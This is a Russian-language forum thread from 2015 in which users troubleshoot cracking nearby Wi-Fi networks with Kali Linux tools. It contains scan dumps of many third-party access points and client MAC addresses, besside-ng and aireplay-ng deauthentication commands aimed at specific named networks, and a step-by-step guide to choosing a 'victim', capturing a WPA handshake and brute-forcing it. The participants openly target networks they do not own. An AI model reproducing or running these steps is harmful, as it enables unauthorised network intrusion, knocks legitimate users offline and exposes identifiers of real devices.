00:18:E7:E8:51:9B -69 25 0 0 9 54e. WPA2 CCMP PSK dlink
00:1E:E5:A0:27:B0 -67 53 56 1 6 54 WPA2 CCMP PSK Inet1125
00:1E:E5:A0:25:30 -69 88 72 0 11 54 WPA2 CCMP PSK Inet829
E0:CB:4E:0B:11:6F -68 57 3 0 6 54 WPA TKIP PSK Zahar
00:26:5A:18:D6:34 -68 48 0 0 12 54e. WPA2 TKIP PSK malahit_hall
C0:4A:00:E4:E3:46 -68 22 1 0 4 54e WPA2 CCMP PSK MNE NE JALKO
40:4A:03:79:81:70 -68 33 0 0 10 54e WPA2 CCMP PSK ZyXEL_KEENETIC_798170
FC:F5:28:65:0C:96 -68 107 0 0 1 54 WPA2 CCMP PSK ROBOT
00:22:B0:40:16:67 -69 94 2 0 3 54 . WPA2 TKIP PSK 208
E0:CB:4E:FC:7D:D5 -69 77 6 0 11 54 WPA TKIP PSK wild
0E:18:D6:47:E9:E0 -71 8 0 0 6 54e. WPA2 CCMP PSK Hololab_guest
58:6D:8F:36:D7:5A -69 8 3 0 6 54e WPA2 CCMP PSK SkyNet
00:27:22:E8:1E:62 -69 4 0 0 1 54e. WPA TKIP PSK ubnt11951
CC:5D:4E:FD:34:C8 -69 5 0 0 6 54e WPA2 CCMP PSK TOLSTY
00:03:7F:FE:00:00 -69 211 2 0 3 54 WPA2 CCMP PSK ibm506
B8:A3:86:0B:BF:1A -69 29 0 0 9 54e WPA CCMP PSK METRO
12:18:D6:47:E9:E0 -70 10 0 0 6 54e. WPA2 CCMP PSK
6A:28:5D:67:19:E8 -69 28 0 0 1 54e WPA2 CCMP PSK Keenetic-2528
E8:94:F6:E5:89:9C -70 15 0 0 10 54e. WPA2 CCMP PSK The_SpeeRT
0A:18:D6:47:E9:E0 -70 6 0 0 6 54e. WPA2 CCMP MGT Hololab
BC:F6:85:CA:33:D2 -71 53 0 0 11 54e WPA2 CCMP PSK DIR-615
34:08:04:13:0A:FE -73 2 0 0 11 54e WPA2 CCMP PSK Mixa83
28:28:5D:96:CA:24 -71 107 0 0 3 54e WPA2 CCMP PSK Keenetic-3064
90:4E:2B:E4:5B:48 -71 32 0 0 3 54e OPN HUAWEI-GLR29J
BC:EE:7B:65:EF:64 -71 31 0 0 10 54e WPA TKIP PSK VPN7505
00:21:D8:93:DC:50 -71 7 0 0 8 54e. OPN bmstu_staff
10:FE:ED:82:24:1E -72 17 0 0 11 54e. WPA2 CCMP PSK TP-LINK_82241E
C4:A8:1D:5B:BB:47 -71 25 0 0 1 54e WPA2 CCMP PSK Deonis2222
00:3A:9A:A5:6E:91 -73 10 0 0 11 54e. OPN bmstu_staff
00:3A:9A:A5:6E:99 -70 13 0 0 11 54e. OPN bmstu_guest
1C:7E:E5:E3:FA:52 -73 28 0 0 13 54e WPA2 TKIP PSK 72111
84:C9:B2:4C:DE:D5 -73 62 0 0 3 54e. WPA2 CCMP PSK s4929
B0:B2:DC:3E:65:4C -73 9 0 0 1 54e WPA2 CCMP PSK Army
28:28:5D:67:8D:34 -74 9 0 0 1 54e WPA2 CCMP PSK dimon0764
00:18:39:76:AA:CA -73 2 0 0 11 54 WPA TKIP PSK linksys
00:1E:E5:A0:27:20 -73 0 2 0 6 -1 WPA
90:94:E4:EF:32:38 -73 7 0 0 1 54e WPA2 CCMP PSK Kostik
40:4A:03:79:2F:95 -72 19 0 0 1 54e WPA2 CCMP PSK s10932
B0:B2:DC:5B:C7:C4 -73 16 1 0 1 54e WPA2 CCMP PSK SovAsQ
AC:22:0B:7C:B9:38 -76 12 0 0 13 54e WPA2 CCMP PSK BURGUY
00:14:D1:E2:D2:2A -75 6 0 0 1 54 . WPA2 TKIP PSK Bardak
EC:43:F6:E1:EE:BC -75 3 0 0 3 54e WPA2 CCMP PSK 119
40:4A:03:44:8A:BA -75 8 0 0 3 54 WPA TKIP PSK Pavel-PC
00:3A:9A:A5:6E:90 -75 1 0 0 11 54e. OPN bmstu_lb
E8:DE:27:C2:EC:1E -72 5 0 0 9 54e. WPA2 CCMP PSK O13311
сразу 2 штуки нашел.
root@kali-Linux:~# besside-ng -W -c 1 -b 1C:BD:B9:3E:1D:24 mon0
[13:57:01] Let's ride
[13:57:01] Resuming from besside.log
[13:57:01] Appending to wpa.cap
[13:57:01] Appending to wep.cap
[13:57:01] Logging to besside.log
[13:57:01] Can't attack BMTWlan_1
[13:57:01] All neighbors owned
Dying...
[13:57:01] TO-OWN [] OWNED []
Почему-то не хочет.
Слишком громко сказал, не найду. Шел около BMW центра:
- ну тут есть, а в верхнем скрине не было.
- открывай besside.log и смотри что он тебе там наловил.
- флаг -W только для WPA.
- root@kali-Linux:~# besside-ng -W -c 1 -b 1C:BD:B9:3E:1D:24 mon0
зачем ты для WEP даёшь флаг -W ?
- для WPA запусти так просто может чё и словит:
root@kali-Linux:~# besside-ng -W mon0
Василий-Шишкин
12.05.2015, 15:35
Наконец-то найшел долгожданного клиента:
CH 6 ][ Elapsed: 5 mins ][ 2015-05-12 14:28 ][ fixed channel mon0: -1
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
60:A4:4C:F0:1B:18 -59 0 928 392 0 6 54e. WPA2 CCMP PSK WEYLAND
BSSID STATION PWR Rate Lost Frames Probe
60:A4:4C:F0:1B:18 B4:52:7E:97:D3:F4 -65 0 - 1 0 9
Отключаю клиента от сети:
root@kali-Linux:~# aireplay-ng --deauth 5 -e WEYLAND -a 60:A4:4C:F0:1B:18 -c B4:52:7E:97:D3:F4 mon0
14:26:59 Waiting for beacon frame (BSSID: 60:A4:4C:F0:1B:18) on channel -1
14:26:59 Couldn't determine current channel for mon0, you should either force the operation with --ignore-negative-one or apply a kernel patch
root@kali-Linux:~# aireplay-ng --deauth 5 -e WEYLAND -a 60:A4:4C:F0:1B:18 -c B4:52:7E:97:D3:F4 wlan0
ioctl(SIOCSIWMODE) failed: Device or resource busy
ARP linktype is set to 1 (Ethernet) - expected ARPHRD_IEEE80211,
ARPHRD_IEEE80211_FULL or ARPHRD_IEEE80211_PRISM instead. Make
sure RFMON is enabled: run 'airmon-ng start wlan0 '
Sysfs injection support was not found either.
но ни чего не смог
- ну тут есть, а в верхнем скрине не было.
- открывай besside.log и смотри что он тебе там наловил.
- флаг -W только для WPA.
- root@kali-Linux:~# besside-ng -W -c 1 -b 1C:BD:B9:3E:1D:24 mon0
зачем ты для WEP даёшь флаг -W ?
- для WPA запусти так просто может чё и словит:
root@kali-Linux:~# besside-ng -W mon0
-W что она делает?
Конкретный роутер пробую ломануть :
root@kali-Linux:~# besside-ng -W -c 6 -b 60:A4:4C:F0:1B:18 mon0
[14:24:16] Let's ride
[14:24:16] Resuming from besside.log
[14:24:16] Appending to wpa.cap
[14:24:16] Appending to wep.cap
[14:24:16] Logging to besside.log
[14:24:17] Got replayable packet for BMTWlan_1 [len 86]
[14:30:29] Got replayable packet for [len 86]
[14:35:00] - Attacking [WEYLAND] WPA - DEAUTH (know 2 clients)
жду пока, может чо получится.
жду пока, может чо получится.
- ерундой страдаешь, запускай minidwep-gtk, она автоматом всё делает и для WPA и WEP.
Василий-Шишкин
12.05.2015, 16:00
- ерундой страдаешь, запускай minidwep-gtk, она автоматом всё делает и для WPA и WEP.
Можете написать целый код или хотябы пример, я новичок в этом не могу так сходу все понимать.
Можете написать целый код или хотябы пример, я новичок в этом не могу так сходу все понимать.
- minidwep-gtk это прога, где в Kali она не знаю, пользуюсь WIFISLAX.
baikalow
12.05.2015, 17:57
может кто разжувать поподробнее как урезать cap файл?
Здравствуйте все !
Задам риторический вопрос Windows 8.1 64 WiFi RTL 8812UA TP-Link очень долго при загрузке поднимается WIFI сетка, кто знает как ускорить этот процесс - загрузка драйвера и подъем соединения WiFi !
Конечно это тривиально, но может кто знает т.к. на устройстве нет проводной сети ! Спс.!
Василий-Шишкин
12.05.2015, 22:11
Добрый вечер.
Во время перехвата хендшейка, появилась проблема: при отключении клиентов от сети (роутера) пишет: No such BSSID available. Вот что я делал:
- нашел роутеров и клиентов
CH 7 ][ Elapsed: 8 s ][ 2015-05-12 20:27
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
28:31:52:24:62:5F -69 4 0 0 6 54e. WPA2 CCMP PSK cln_wifi_mgts
54:04:A6:5B:9D:94 -66 15 0 0 5 54e WPA2 CCMP PSK MosUrGarant
B8:A3:86:6B:F5:CC -68 2 0 0 6 54e WPA2 CCMP PSK WE_ARE_HERE
1C:AF:F7:82:6A:62 -67 9 0 0 6 54 WPA2 TKIP PSK dlink
BA:2B:C1:5A:15:A7 -1 4 0 0 10 54 OPN Portthru
C4:6E:1F:A4:B6:C0 -57 18 0 0 3 54e. WPA CCMP PSK cosmos13287
64:70:02:A1:BA:AE -48 15 0 0 11 54e. WPA2 CCMP PSK TechNoServ
C2:4A:00:7F:B2:6E -47 20 0 0 11 54 . WPA CCMP PSK
C0:4A:00:7F:B2:6E -49 17 0 0 11 54e. WPA2 CCMP MGT TechnoServCORP
E4:68:A3:10:04:DE -55 9 0 0 11 54e. WPA2 CCMP PSK MGTS_112
10:FE:ED:F6:52:31 -53 38 0 0 6 54e. WPA2 CCMP PSK PPRB Hotel 5
4E:5D:4E:4B:93:E8 -56 24 0 0 5 54e WPA2 CCMP PSK MosUrGarant
94:04:9C:62:D7:98 -59 12 0 0 11 54e WPA2 CCMP PSK MGTS 119
10:FE:ED:F6:47:EB -62 6 0 0 2 54e. WPA2 CCMP PSK PPRB Hotel 4
4C:5E:0C:6A:E0:85 -47 10 0 0 4 54e. WPA2 CCMP PSK MKT-Wireless
4E:5D:4E:4B:93:E9 -55 25 0 0 5 54e WPA2 CCMP PSK MosUr
E4:68:A3:10:0A:F6 -63 15 0 0 6 54e. WPA2 CCMP PSK mgts-115
7C:B7:33:25:7E:84 -65 4 1 0 6 54e WPA2 CCMP PSK AKADO-7E7E
EC:43:F6:05:34:88 -65 4 0 0 2 54e WPA2 CCMP PSK ALGO_WIFI
08:60:6E:EF:1A:98 -62 17 1 0 11 54e WPA2 CCMP PSK Home126-2
C8:D3:A3:EC:95:5A -66 13 0 0 11 54e WPA CCMP PSK DSL-2740U
F8:C0:91:13:B2:FF -67 10 0 0 8 54e WPA2 CCMP PSK onlime9
7C:B7:33:26:84:08 -66 3 1 0 1 54e WPA2 CCMP PSK AKADO-8402
E4:68:A3:0F:DC:98 -65 12 0 0 6 54e. WPA2 CCMP PSK mgts-111
60:33:4B:E3:54:C7 -65 7 0 0 7 54e. WPA2 CCMP PSK Apple Forevah Nah
00:27:22:E8:1E:3C -67 10 0 0 8 54e. WPA TKIP PSK UBNT10780
B8:BE:BF:EF:83:19 -69 3 0 0 1 54e. WPA2 CCMP PSK CLASS-211
1C:BD:B9:B2:43:02 -69 5 0 0 11 54e. WPA2 CCMP PSK dlink-dlink
00:17:31:1B:03:E2 -70 4 0 0 1 54 WPA TKIP PSK Tata-77
00:24:8C:A0:46:E5 -68 13 1 0 6 54 WPA TKIP PSK tsj
10:FE:ED:F6:4E:ED -72 2 0 0 2 54e. WPA2 CCMP PSK PPRB Hotel 4
E0:CE:C3:C6:F5:C6 -73 2 1 0 8 54e WPA2 CCMP PSK AKADO-F5C0
BSSID STATION PWR Rate Lost Frames Probe
BA:2B:C1:5A:15:A7 00:15:99:B0:75:A0 -73 0 - 1 31 4
(not associated) 00:C0:CA:81:EC:0E -9 0 - 1 0 2
(not associated) AC:38:70:92:07:4D -65 0 - 1 0 1
(not associated) 00:18:DE:D0:BD:EA -69 0 - 1 17 7 Spacenet
(not associated) F8:D1:11:08:31:51 -69 0 - 1 0 1 mgts-148
(not associated) 00:16:EB:1F:65:E4 -69 0 - 1 48 10 AKADO-24B8
(not associated) 84:7A:88:97:06:C8 -73 0 - 1 44 5
(not associated) 24:0A:64:74:54:53 -71 0 - 1 0 1
- выбрал нужный канал и BSSID
CH 10 ][ Elapsed: 38 mins ][ 2015-05-12 21:06 ][ fixed channel mon0: -1
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH E
BA:2B:C1:5A:15:A7 -1 0 2978 0 0 10 54 OPN P
BSSID STATION PWR Rate Lost Frames Probe
BA:2B:C1:5A:15:A7 00:15:99:B0:75:A0 -73 0 - 1 0 2983
И самое интересное, пытаюсь отключить клиента ( со всех сайтов команды пробовал) :
root@kali-Linux:~# aireplay-ng -1 9999 -e Portthru -a BA:2B:C1:5A:15:A7 -c 00:15:99:B0:75:A0 --ignore-negative-one mon0No source MAC (-h) specified. Using the device MAC (9C:AD:97:4D:37:19)
21:08:43 Waiting for beacon frame (BSSID: BA:2B:C1:5A:15:A7) on channel -1
21:08:54 No such BSSID available.
root@kali-Linux:~# aireplay-ng -1 6000 -e Portthru -a BA:2B:C1:5A:15:A7 --ignore-negative-one mon0
No source MAC (-h) specified. Using the device MAC (9C:AD:97:4D:37:19)
21:09:03 Waiting for beacon frame (BSSID: BA:2B:C1:5A:15:A7) on channel -1
21:09:13 No such BSSID available.
root@kali-Linux:~# aireplay-ng -1 6000 -o 1 -q 100 -e Portthru -a BA:2B:C1:5A:15:A7 --ignore-negative-one mon0
No source MAC (-h) specified. Using the device MAC (9C:AD:97:4D:37:19)
21:09:30 Waiting for beacon frame (BSSID: BA:2B:C1:5A:15:A7) on channel -1
21:09:40 No such BSSID available.
root@kali-Linux:~# aireplay-ng -1 6000 -o 1 -q 100 -e Portthru -a BA:2B:C1:5A:15:A7 -c 00:15:99:B0:75:A0 --ignore-negative-one mon0
No source MAC (-h) specified. Using the device MAC (9C:AD:97:4D:37:19)
21:09:57 Waiting for beacon frame (BSSID: BA:2B:C1:5A:15:A7) on channel -1
21:10:07 No such BSSID available.
root@kali-Linux:~# aireplay-ng -1 6000 -o 1 -q 100 -e Portthru -a BA:2B:C1:5A:15:A7 -h 00:15:99:B0:75:A0 --ignore-negative-one mon0
The interface MAC (9C:AD:97:4D:37:19) doesn't match the specified MAC (-h).
ifconfig mon0 hw ether 00:15:99:B0:75:A0
21:10:16 Waiting for beacon frame (BSSID: BA:2B:C1:5A:15:A7) on channel -1
21:10:26 No such BSSID available.
Что я не пробовал резудьтат один.
А ждать пока клиент сам оключится от сети, это может только завтра произойти.
------------------------------------------------------------------------------------------------------------------------------------------------------------
Плохой, конечно, пример выбрал, так как сеть эта открыта, но суть не в этом есть море примеров:
root@kali-Linux:~# aireplay-ng -1 9999 -e HP02ACAB -a 02:2F:0F:AE:44:A9 -c 2C:76:8A:02:AC:AB --ignore-negative-one mon0
No source MAC (-h) specified. Using the device MAC (9C:AD:97:4D:37:19)
21:28:59 Waiting for beacon frame (BSSID: 02:2F:0F:AE:44:A9) on channel -1
21:29:09 No such BSSID available.
Этот пример с закрытой сетью (WPA2).
Можете написать целый код или хотябы пример, я новичок в этом не могу так сходу все понимать.
1. Останавливаешь wifi адаптер командой:
ifconfig wlanX down (где X это номер твоего адаптера, узнать можно командой ifconfig -a)
2. Убиваешь мешающие процессы командой
airmon-ng wlanX check kill
3. Запускаешь режим мониторинга
airmon-ng start wlanX (появится адаптер mon0)
4. Далее смотришь не спеша по каналам выбирая жертву
airodump-ng mon0 -a -c 6 (-а не показывать неассоциированных клиентов, т.е. просто wifi устройства не подключенные к сети - с 6 - шестой канал, смотреть нужно по каналам так сразу видишь качество приема жертвы на конкретном канале, записываешь мак жертвы: точнее два мака точки доступа и клиента)
5. Выбрав жертву отключаешь аирдамп и запускаешь мониторить именно жертву
airodump-ng mon0 -a -d MM:MM:MM:MM:MM:MM -c 6 -w filename (тут MM:MM:MM:MM:MM:MM mac точки доступа жертвы, канал также шестой нужно поставит на тот на котором сидит жертва, -w записать пойманные данные в файл с именем filename)
6. Одновременно не отключая аирдампа в соседней консоли даешь команду
aireplay-ng mon0 -a MM:MM:MM:MM:MM:MM -c CC:CC:CC:CC:CC:CC -0 5 (тут MM:MM:MM:MM:MM:MM - мак точки доступа жертвы, СС:СС:СС:СС:СС:СС мак клиента жертвы, -0 команда на отключения клиента от точки доступа, 5 - количество попыток отключения) Как дашь команду не торопись подожди минутку смотря на первую консоль, не пойман ли шендшейк, если не пойман то повтори попытку отключения клиента от точки доступа и во второй консоле. После пойманного хендшейка брутишь файл filename.cap. Чем брутить это уже другое дело либо тут выложить кто нибудь да поможет, или самому.
Ну вот вроде все разжевал.
Для отсутствия ошибки fixset channel -1 не подымай основной интерфейс.
Василий-Шишкин
12.05.2015, 22:41
1. Останавливаешь wifi адаптер командой:
ifconfig wlanX down (где X это номер твоего адаптера, узнать можно командой ifconfig -a)
2. Убиваешь мешающие процессы командой
airmon-ng wlanX check kill
3. Запускаешь режим мониторинга
airmon-ng start wlanX (появится адаптер mon0)
4. Далее смотришь не спеша по каналам выбирая жертву
airodump-ng mon0 -a -c 6 (-а не показывать неассоциированных клиентов, т.е. просто wifi устройства не подключенные к сети - с 6 - шестой канал, смотреть нужно по каналам так сразу видишь качество приема жертвы на конкретном канале, записываешь мак жертвы: точнее два мака точки доступа и клиента)
5. Выбрав жертву отключаешь аирдамп и запускаешь мониторить именно жертву
airodump-ng mon0 -a -d MM:MM:MM:MM:MM:MM -c 6 -w filename (тут MM:MM:MM:MM:MM:MM mac точки доступа жертвы, канал также шестой нужно поставит на тот на котором сидит жертва, -w записать пойманные данные в файл с именем filename)
6. Одновременно не отключая аирдампа в соседней консоли даешь команду
aireplay-ng mon0 -a MM:MM:MM:MM:MM:MM -c CC:CC:CC:CC:CC:CC -0 5 (тут MM:MM:MM:MM:MM:MM - мак точки доступа жертвы, СС:СС:СС:СС:СС:СС мак клиента жертвы, -0 команда на отключения клиента от точки доступа, 5 - количество попыток отключения) Как дашь команду не торопись подожди минутку смотря на первую консоль, не пойман ли шендшейк, если не пойман то повтори попытку отключения клиента от точки доступа и во второй консоле. После пойманного хендшейка брутишь файл filename.cap. Чем брутить это уже другое дело либо тут выложить кто нибудь да поможет, или самому.
Ну вот вроде все разжевал.
Для отсутствия ошибки fixset channel -1 не подымай основной интерфейс.
Спасибо все понятно, польшенство я так и делал. Вот у вас под цифрой 6: вывод такой у меня:
root@kali-Linux:~# aireplay-ng mon0 -e HP02ACAB -a 02:2F:0F:AE:44:A9 -c 2C:76:8A:02:AC:AB -0 5 --ignore-negative-one
21:39:31 Waiting for beacon frame (BSSID: 02:2F:0F:AE:44:A9) on channel -1
21:39:41 No such BSSID available.
Только не понял:
Для отсутствия ошибки fixset channel -1 не подымай основной интерфейс.
Как это не поднимать основной интерфейс
Спасибо все понятно, польшенство я так и делал. Вот у вас под цифрой 6: вывод такой у меня:
root@kali-Linux:~# aireplay-ng mon0 -e HP02ACAB -a 02:2F:0F:AE:44:A9 -c 2C:76:8A:02:AC:AB -0 5 --ignore-negative-one
21:39:31 Waiting for beacon frame (BSSID: 02:2F:0F:AE:44:A9) on channel -1
21:39:41 No such BSSID available.
Только не понял:
Как это не поднимать основной интерфейс
так и не поднимать, если ты под кали просто попробуй ifconfig wlanX down а работать будешь с новым mon0, и в aireplay не надо указывать оба параметра -e и -a достаточно просто -a
Василий-Шишкин
12.05.2015, 22:59
так и не поднимать, если ты под кали просто попробуй ifconfig wlanX down а работать будешь с новым mon0, и в aireplay не надо указывать оба параметра -e и -a достаточно просто -a
Да верно, спасибо ошибка ушла:
CH 10 ][ Elapsed: 0 s ][ 2015-05-12 21:58
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
02:2F:0F:AE:44:A9 -1 0 9 0 0 10 11 OPN HP02ACAB
BSSID STATION PWR Rate Lost Frames Probe
02:2F:0F:AE:44:A9 2C:76:8A:02:AC:AB -67 0 - 1 13 9
А вот в отключенни ESSID все равно требует, и ошибка не ушла:
root@kali-Linux:~# aireplay-ng mon0 -a 02:2F:0F:AE:44:A9 -c 2C:76:8A:02:AC:AB -0 5 --ignore-negative-one
21:55:37 Waiting for beacon frame (BSSID: 02:2F:0F:AE:44:A9) on channel 10
21:55:47 No such BSSID available.
Please specify an ESSID (-e).
root@kali-Linux:~# aireplay-ng mon0 -e HP02ACAB -a 02:2F:0F:AE:44:A9 -c 2C:76:8A:02:AC:AB -0 5 --ignore-negative-one
21:56:54 Waiting for beacon frame (BSSID: 02:2F:0F:AE:44:A9) on channel 10
21:57:04 No such BSSID available.
Василий-Шишкин
12.05.2015, 23:09
Интересно он в строке fixset channel вот что пишет:
CH 10 ][ Elapsed: 9 mins ][ 2015-05-12 22:07 ][ fixed channel mon0: 13
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
02:2F:0F:AE:44:A9 -1 0 3257 0 0 10 11 OPN HP02ACAB
BSSID STATION PWR Rate Lost Frames Probe
02:2F:0F:AE:44:A9 2C:76:8A:02:AC:AB -63 0 - 1 38 3257
С 1 по (примерно) 15 подбирает, я зафиксировал 13. Так и должно быть?
WLAN0 отключен:
root@kali-Linux:~# ifconfig
eth0 Link encap:Ethernet HWaddr 28:d2:44:a9:92:6c
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:112 errors:0 dropped:0 overruns:0 frame:0
TX packets:112 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:6720 (6.5 KiB) TX bytes:6720 (6.5 KiB)
mon0 Link encap:UNSPEC HWaddr 9C-AD-97-4D-37-19-3A-30-00-00-00-00-00-00-00-00
UP BROADCAST NOTRAILERS RUNNING PROMISC ALLMULTI MTU:1500 Metric:1
RX packets:590118 errors:0 dropped:14140 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:122378467 (116.7 MiB) TX bytes:0 (0.0 B)
usb0 Link encap:Ethernet HWaddr 36:4b:50:b7:ef:2d
inet addr:192.168.0.182 Bcast:192.168.0.255 Mask:255.255.255.0
inet6 addr: fe80::344b:50ff:feb7:ef2d/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:19581 errors:0 dropped:0 overruns:0 frame:0
TX packets:19497 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:17222457 (16.4 MiB) TX bytes:2192415 (2.0 MiB)
Потому что в начале мониторинга этого не наблюдается:
CH 10 ][ Elapsed: 16 s ][ 2015-05-12 22:14
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
02:2F:0F:AE:44:A9 -1 0 130 0 0 10 11 OPN HP02ACAB
BSSID STATION PWR Rate Lost Frames Probe
02:2F:0F:AE:44:A9 2C:76:8A:02:AC:AB -67 0 - 1 19 130
Да верно, спасибо ошибка ушла:
CH 10 ][ Elapsed: 0 s ][ 2015-05-12 21:58
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
02:2F:0F:AE:44:A9 -1 0 9 0 0 10 11 OPN HP02ACAB
BSSID STATION PWR Rate Lost Frames Probe
02:2F:0F:AE:44:A9 2C:76:8A:02:AC:AB -67 0 - 1 13 9
А вот в отключенни ESSID все равно требует, и ошибка не ушла:
root@kali-Linux:~# aireplay-ng mon0 -a 02:2F:0F:AE:44:A9 -c 2C:76:8A:02:AC:AB -0 5 --ignore-negative-one
21:55:37 Waiting for beacon frame (BSSID: 02:2F:0F:AE:44:A9) on channel 10
21:55:47 No such BSSID available.
Please specify an ESSID (-e).
root@kali-Linux:~# aireplay-ng mon0 -e HP02ACAB -a 02:2F:0F:AE:44:A9 -c 2C:76:8A:02:AC:AB -0 5 --ignore-negative-one
21:56:54 Waiting for beacon frame (BSSID: 02:2F:0F:AE:44:A9) on channel 10
21:57:04 No such BSSID available.
Судя по показаниям аирдампа точка доступа далеко и ты видишь только клинета, попробуй на другой жертве. желательно чтобы показатель RXQ был близок к 100. Почитай об использовании направленных антенн есть такой форум по антеннам lan23.ru там множество конструкций антенн для нашего дела из подручных материалов.
Василий-Шишкин
12.05.2015, 23:19
Судя по показаниям аирдампа точка доступа далеко и ты видишь только клинета, попробуй на другой жертве. желательно чтобы показатель RXQ был близок к 100. Почитай об использовании направленных антенн есть такой форум по антеннам lan23.ru там множество конструкций антенн для нашего дела из подручных материалов.
К 100, как это провернуть, у меня этот показатель равен 0, если я в правельной таблитце смотрю.
Если по таблице смотреть и по параметру PWR:
CH 12 ][ Elapsed: 8 s ][ 2015-05-12 22:20
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
D4:BF:7F:0F:A5:FD -73 2 0 0 5 54e WPA2 CCMP PSK onlime83
E8:BE:81:3E:46:09 -75 3 0 0 6 54e WPA CCMP PSK stream-51
BC:F6:85:44:A2:E6 -76 4 0 0 4 54e WPA CCMP PSK SEGUNDO
C2:9F:DB:57:A9:4F -67 8 0 0 6 54e. WPA2 CCMP PSK FODD
28:28:5D:6C:34:10 -71 15 0 0 4 54e WPA2 CCMP PSK H10372
28:C6:8E:5D:C1:6E -72 16 0 0 5 54e WPA2 CCMP PSK chuvanometers
02:2D:5D:BA:E1:B7 -1 22 0 0 10 11 . OPN HP01DEF2
02:29:59:05:A0:51 -1 37 0 0 10 11 . OPN HP01EE06
02:2F:0F:AE:44:A9 -1 50 0 0 10 11 OPN HP02ACAB
00:19:E1:00:E5:31 -57 33 0 0 10 54e. WPA2 CCMP MGT Beeline_WiFi_WPA
00:19:E1:00:E5:30 -58 35 0 0 10 54e. OPN Beeline_WiFi
E0:CE:C3:C7:D1:B3 -62 2 0 0 1 54e WPA2 CCMP PSK AKADO-D1AD
00:19:E1:FF:B2:71 -66 5 0 0 1 54e. WPA2 CCMP MGT Beeline_WiFi_WPA
00:19:E1:FF:B2:70 -64 5 0 0 1 54e. OPN Beeline_WiFi
D4:BF:7F:0B:EE:DC -65 29 0 0 2 54e WPA2 CCMP PSK onlime16
00:18:B0:EE:FD:01 -65 2 0 0 1 54e. WPA2 CCMP MGT Beeline_WiFi_WPA
68:94:23:D5:03:DC -65 23 0 0 6 54e. OPN HP-Print-DC-LaserJet 1102
90:94:E4:87:D8:90 -65 28 0 0 6 54e WPA2 CCMP PSK interaffairs1
00:19:E1:02:0B:91 -65 46 0 0 10 54e. WPA2 CCMP MGT Beeline_WiFi_WPA
00:19:E1:02:0B:90 -65 49 0 0 10 54e. OPN Beeline_WiFi
00:18:B0:EE:FD:00 -67 2 0 0 1 54e. OPN Beeline_WiFi
C0:70:09:F9:DB:98 -67 3 0 0 1 54e WPA2 CCMP PSK mgts15
00:19:E1:FF:B2:81 -69 52 0 0 10 54e. WPA2 CCMP MGT Beeline_WiFi_WPA
00:19:E1:FF:B2:80 -68 49 0 0 10 54e. OPN Beeline_WiFi
00:19:E1:01:11:B1 -69 35 0 0 10 54e. WPA2 CCMP MGT Beeline_WiFi_WPA
E0:CB:4E:6B:D1:B4 -69 29 0 0 11 54e WPA TKIP PSK fd57bb
00:19:E1:01:11:B0 -69 38 0 0 10 54e. OPN Beeline_WiFi
00:19:E1:00:58:71 -70 43 0 0 10 54e. WPA2 CCMP MGT Beeline_WiFi_WPA
58:23:8C:04:20:19 -71 8 0 0 6 54e WPA2 CCMP PSK Tech_D0003498
00:19:E1:00:A0:C0 -71 2 0 0 1 54e. OPN Beeline_WiFi
00:19:E1:02:4F:E1 -71 4 0 0 10 54e. WPA2 CCMP MGT Beeline_WiFi_WPA
00:19:E1:00:58:70 -72 37 0 0 10 54e. OPN Beeline_WiFi
D4:BF:7F:00:FB:6C -71 20 0 0 5 54e WPA2 CCMP PSK onlime
58:23:8C:81:AA:0B -73 3 0 0 1 54e WPA2 CCMP PSK Tech_D0022503
FC:75:16:01:7E:38 -71 8 0 0 11 54e. WPA2 CCMP PSK interaffairs1
C0:70:09:FA:80:6C -76 4 0 0 11 54e WPA2 CCMP PSK mgts73
00:19:E1:00:D5:41 -74 11 0 0 10 54e. WPA2 CCMP MGT Beeline_WiFi_WPA
00:19:E1:00:FD:71 -73 36 0 0 10 54e. WPA2 CCMP MGT Beeline_WiFi_WPA
00:19:E1:00:FD:70 -74 38 0 0 10 54e. OPN Beeline_WiFi
D4:BF:7F:00:A1:6C -75 3 0 0 13 54e WPA2 CCMP PSK onlime32
4C:5E:0C:BB:D6:17 -75 1 1 0 1 54e. WPA2 CCMP PSK AQUA-TORG
00:19:E1:01:08:E0 -76 27 0 0 10 54e. OPN Beeline_WiFi
C0:70:09:FA:63:78 -76 3 0 0 1 54e WPA2 CCMP PSK mgts69
00:1F:CE:4F:2F:9E -77 2 0 0 1 54e WPA2 CCMP PSK MY_MGTS
00:19:E1:01:08:E1 -77 28 0 0 10 54e. WPA2 CCMP MGT Beeline_WiFi_WPA
00:19:E1:00:D5:40 -74 29 0 0 10 54e. OPN Beeline_WiFi
BSSID STATION PWR Rate Lost Frames Probe
02:2D:5D:BA:E1:B7 2C:76:8A:01:DE:F2 -67 0 - 1 82 25 HP01DEF2
02:29:59:05:A0:51 2C:76:8A:01:EE:06 -63 0 - 1 69 37
02:2F:0F:AE:44:A9 2C:76:8A:02:AC:AB -71 0 - 1 62 50
то очень ладе не плохой.
Интересно он в строке fixset channel вот что пишет:
CH 10 ][ Elapsed: 9 mins ][ 2015-05-12 22:07 ][ fixed channel mon0: 13
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
02:2F:0F:AE:44:A9 -1 0 3257 0 0 10 11 OPN HP02ACAB
BSSID STATION PWR Rate Lost Frames Probe
